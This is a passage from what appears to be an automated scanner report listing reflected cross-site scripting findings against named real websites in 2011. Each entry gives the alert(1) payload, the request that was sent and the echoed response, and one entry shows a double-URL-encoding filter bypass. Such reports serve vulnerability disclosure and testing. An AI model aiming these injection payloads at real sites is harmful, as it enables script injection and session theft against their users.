User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:22 GMT
Server: Apache/2.2.3 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=4A24C55EA8AA587CCF8856C6C9BFB24A; Domain=.gather.com; Path=/
Set-Cookie: vis=RyOcPuDxMFUGP3B0WVrMrdgk+Fv7TLiAW3OByYniiiDpLR+P/Pm0tG1Nows/zVLDfFPcwb2RlnPBjDhfuWVzAqWnKeeDBF1/gMVhlwJ1RSc=; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:22 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=KW1zZbLcDLkbttCjTEPka5YrQnepZ8pHskgphI0gOdszkdWMqudZ95Jb7/76/tOlkeRmmJL7fpmjoICIH6sXwwAd09L9KZQWlUI0WxvLZi3sfdXOAhI/xZQCjpJNlT+R; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:22 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17544
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<em>12711<img src=a onerror=alert(1)>929de4ce53b</em>
...[SNIP]...

6.49. http://www.gather.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gather.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3197c"><a>1af48c031bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /3197c"><a>1af48c031bb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:05 GMT
Server: Apache/2.2.3 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=DA1461106BFAE965E4902BC6A28B47D8; Domain=.gather.com; Path=/
Set-Cookie: vis=UjjmQmSy0/vTCt18edV5yG7Hdy8T9xl9k7Es17tCqMMJpFjxuqlR5UcQ461iN1fmmD5JU4aHsvhJi8Y6SPee6UXzWH78Piq8kZfJO9L+2ZU=; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=3O1JaJHhBrlqO2HsxQwvvNgk+Fv7TLiAn1BRbSOCyEOukF3ZG9POyIobiPsZ/q8ko5SAnn39resA8mu0ppEVBXCt9+uNQE6iPrjrPjwNPHYdyAEmmABmC03bbftbh5TG; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:34:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17459
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<meta name="keywordVal" content="3197c"><a>1af48c031bb" >
...[SNIP]...

6.50. http://www.gourmandia.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gourmandia.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98084"><script>alert(1)</script>c7f5e1781ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico98084"><script>alert(1)</script>c7f5e1781ab HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gourmandia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:57:51 GMT
Server: Apache
Set-Cookie: PHPSESSID=m5h7u4477a8qnj9sg8pmkq0895; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<title>4
...[SNIP]...
<form id="testform" action="/404.php/favicon.ico98084"><script>alert(1)</script>c7f5e1781ab" method="post">
...[SNIP]...

6.51. http://www.healthline.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.healthline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e4f5'%3bd3fe8a4b78d was submitted in the REST URL parameter 1. This input was echoed as 6e4f5';d3fe8a4b78d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico6e4f5'%3bd3fe8a4b78d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:41:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51348

<!--
URI: /favicon.ico6e4f5';d3fe8a4b78dservletName: defaultstatusCode: 404
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<
...[SNIP]...
anguage="JavaScript" src="http://ad.doubleclick.net/adj/hn.us.hl.er.x.x.x/none' + btk1 + btk2 + ';kw=generalhealth;k1=none;k2=none;k3=health;pos=lb;ac=32688|32431|32457|35032|32461;pv=;url=/favicon.ico6e4f5';d3fe8a4b78d;type=top_rb;bf=no;tile=' + dfpTileIdx++ + ';sz=728x90;dcopt=ist;ord=' + hlnord + ';u=generalhealth|none|none|health|32688,32431,32457,35032,32461|lb||||/favicon.ico6e4f5';d3fe8a4b78d|top_rb||?" type="
...[SNIP]...

6.52. http://www.healthline.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.healthline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c252"%3b2599a835db0 was submitted in the REST URL parameter 1. This input was echoed as 7c252";2599a835db0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico7c252"%3b2599a835db0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
P3P: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:41:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51348

<!--
URI: /favicon.ico7c252";2599a835db0servletName: defaultstatusCode: 404
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<
...[SNIP]...
cadc=0;var erpm=0;
/*var unicaEvents = new Array();
var unicaEventIdx = 0;*/
var g_cfn="generalhealth";
var g_cfn_bold = "generalhealth";
var g_encoded_uri = encodeURI("/favicon.ico7c252";2599a835db0");
</script>
...[SNIP]...

6.53. http://www.hollywood.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollywood.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d966%2522%253balert%25281%2529%252f%252f0182ae2d622 was submitted in the REST URL parameter 1. This input was echoed as 2d966";alert(1)//0182ae2d622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.ico2d966%2522%253balert%25281%2529%252f%252f0182ae2d622 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywood.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:35:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zb0r3g55zp22f1foo3vkycei; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hollywood.com </title>
<script type="text
...[SNIP]...
function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="h.hollywood.com";
hbx.acct="DM550817IOBZ38EN3";
hbx.pn="404/favicon.ico2d966";alert(1)//0182ae2d622";
hbx.mlc="Error";hbx.pndef="";hbx.ctdef="full";hbx.lt="auto";
hbx.dlf="n";
</script>
...[SNIP]...

6.54. http://www.inc.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.inc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b186"><script>alert(1)</script>7e885573fb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4b186"><script>alert(1)</script>7e885573fb4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:20:54 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.11
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from VoxCAST
Content-Length: 40001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="returl" value="http://www.inc.com/favicon.ico4b186"><script>alert(1)</script>7e885573fb4">
...[SNIP]...

6.55. http://www.instructables.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instructables.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 492f7<script>alert(1)</script>1ee22699fd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico492f7<script>alert(1)</script>1ee22699fd5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.instructables.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
Cache-Control: no-cache
X-Cacheable: no-404
Content-Length: 17716
Date: Sat, 02 Apr 2011 13:37:19 GMT
X-Varnish: 4085213196
Age: 0
Via: 1.1 varnish
X-Cache-Svr: squid03.instructables.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<p>
&nbsp;&nbsp;We're sorry, the URL http://www.instructables.com/favicon.ico492f7<script>alert(1)</script>1ee22699fd5 is either incorrect or no longer available. Maybe you are looking for one of the following Instructables below.
</p>
...[SNIP]...

6.56. http://www.kaboose.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboose.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4633</script><script>alert(1)</script>ef96f9ca301 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof4633</script><script>alert(1)</script>ef96f9ca301 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kaboose.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:40:52 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9
X-Powered-By: PHP/4.4.9
Set-Cookie: ad_types_404.html=itype%3DBanner2%26itype%3DSponsorLink2%26itype%3DSponsorLink1%26itype%3DRectangle2%26itype%3DSponsorFeature%26itype%3DRectangle%26itype%3DSponsorBar%26itype%3DSkyscraper-Left%26itype%3DSponsorLogo%26itype%3DPeelback2%26itype%3DOverPage%26itype%3DInterstitial%26itype%3DCatfish%26itype%3DPeelback%26itype%3DBanner; expires=Sat, 02 Apr 2011 13:44:52 GMT
Content-Type: text/html; charset=utf-8
X-UA-COMPATIBLE: IE=EmulateIE7
Content-Length: 86182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<he
...[SNIP]...
<script type="text/javascript">
mboxCreate('KAB_Global_Mbox', "pageName=www.kaboose.com/favicon.icof4633</script><script>alert(1)</script>ef96f9ca301");
</script>
...[SNIP]...

6.57. http://www.letssingit.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letssingit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0854"><script>alert(1)</script>62f1be08ee8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc0854"><script>alert(1)</script>62f1be08ee8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.letssingit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: country=us; expires=Monday, 02-May-2011 13:59:11 GMT;path=/; domain=.letssingit.com
Set-Cookie: language=en; expires=Monday, 02-May-2011 13:59:11 GMT;path=/; domain=.letssingit.com
Set-Cookie: session_views=1; path=/; domain=.letssingit.com
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22702

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE>
<META http-equiv="content-type" content="tex
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6772046&amp;c3=&amp;c4=www.letssingit.com/favicon.icoc0854"><script>alert(1)</script>62f1be08ee8&amp;c5=&amp;c6=&amp;c15=&amp;cj=1"/>
...[SNIP]...

6.58. http://www.letssingit.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letssingit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc674"-alert(1)-"1a90c41c69d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocc674"-alert(1)-"1a90c41c69d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.letssingit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: country=us; expires=Monday, 02-May-2011 13:59:12 GMT;path=/; domain=.letssingit.com
Set-Cookie: language=en; expires=Monday, 02-May-2011 13:59:12 GMT;path=/; domain=.letssingit.com
Set-Cookie: session_views=1; path=/; domain=.letssingit.com
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22681

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Lyrics, albums, songs, artists and more music | LetsSingIt</TITLE>
<META http-equiv="content-type" content="tex
...[SNIP]...
<script type="text/javascript">COMSCORE.beacon({c1:2,c2:"6772046",c3:"",c4:"www.letssingit.com/favicon.icocc674"-alert(1)-"1a90c41c69d",c5:"",c6:"",c15:""});</script>
...[SNIP]...

6.59. http://www.mainstreet.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mainstreet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5ac2"><script>alert(1)</script>25e47d014c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof5ac2"><script>alert(1)</script>25e47d014c2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mainstreet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:04:47 GMT
Server: Apache
Set-Cookie: SESS0e250a232fad80ec5d88c23e55d760d9=u0phpluvnnfdapsm79149neq37; expires=Mon, 25 Apr 2011 17:38:07 GMT; path=/; domain=.mainstreet.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:04:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
X-Debug: msweb04
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Node type: site_content (4100)
Node title: 404 Page
Last Generated: 20110
...[SNIP]...
<link rel="canonical" href="http://www.mainstreet.com/favicon.icof5ac2"><script>alert(1)</script>25e47d014c2" />
...[SNIP]...

6.60. http://www.manta.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f6ae0<script>alert(1)</script>b625fad29ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof6ae0<script>alert(1)</script>b625fad29ae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:43:10 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4714
X-Varnish: 2363475455
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br>
Access Denied: http://www.manta.com/favicon.icof6ae0<script>alert(1)</script>b625fad29ae at Sat Apr 2 12:43:10 2011 +0000 from 173.193.214.243<br>
...[SNIP]...

6.61. http://www.manta.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d5c"><script>alert(1)</script>8122b86cb15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico56d5c"><script>alert(1)</script>8122b86cb15 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:43:10 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4718
X-Varnish: 2363475440
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico56d5c"><script>alert(1)</script>8122b86cb15 at Sat Apr 2 12:43:10 2011 +0000 from 173.193.214.243">
...[SNIP]...

6.62. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b779f<script>alert(1)</script>fb24f2fd142 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?b779f<script>alert(1)</script>fb24f2fd142=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:42:43 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4720
X-Varnish: 3115951942
Via: 1.1 varnish
X-Served-By: ecnext41
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br>
Access Denied: http://www.manta.com/favicon.ico?b779f<script>alert(1)</script>fb24f2fd142=1 at Sat Apr 2 12:42:43 2011 +0000 from 173.193.214.243<br>
...[SNIP]...

6.63. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c655a"><script>alert(1)</script>db5a4dbfb1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c655a"><script>alert(1)</script>db5a4dbfb1a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 12:42:43 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4724
X-Varnish: 1295727862
Via: 1.1 varnish
X-Served-By: ecnext43
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico?c655a"><script>alert(1)</script>db5a4dbfb1a=1 at Sat Apr 2 12:42:43 2011 +0000 from 173.193.214.243">
...[SNIP]...

6.64. http://www.marthastewart.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marthastewart.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4257a"-alert(1)-"d960cce6c75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4257a"-alert(1)-"d960cce6c75 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marthastewart.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Last-Modified: Sat, 02 Apr 2011 13:34:25 +0000
ETag: "1301751265"
Content-Type: text/html; charset=utf-8
X-Ttl: 14400.000
ntCoent-Length: 21362
X-Varnish: 1769286479
X-Req-Grace: 20.000
Cache-Control: private, max-age=0
Expires: Sat, 02 Apr 2011 13:34:26 GMT
Date: Sat, 02 Apr 2011 13:34:26 GMT
Content-Length: 21362
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
mniturePageName="page not found";
s.server="www.marthastewart.com";
s.pageType="";
s.prop1="";
s.prop3="";
s.prop4="channel";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop12="http://www.marthastewart.com/4257a"-alert(1)-"d960cce6c75";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop17="";
s.prop18="";
s.prop19="";
s.prop20="";
s.prop21="";
s.prop22="";
s.prop23="";
s.prop24="";
s.prop25="";
s.prop26="";
s.prop27="logged
...[SNIP]...

6.65. http://www.mayoclinic.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

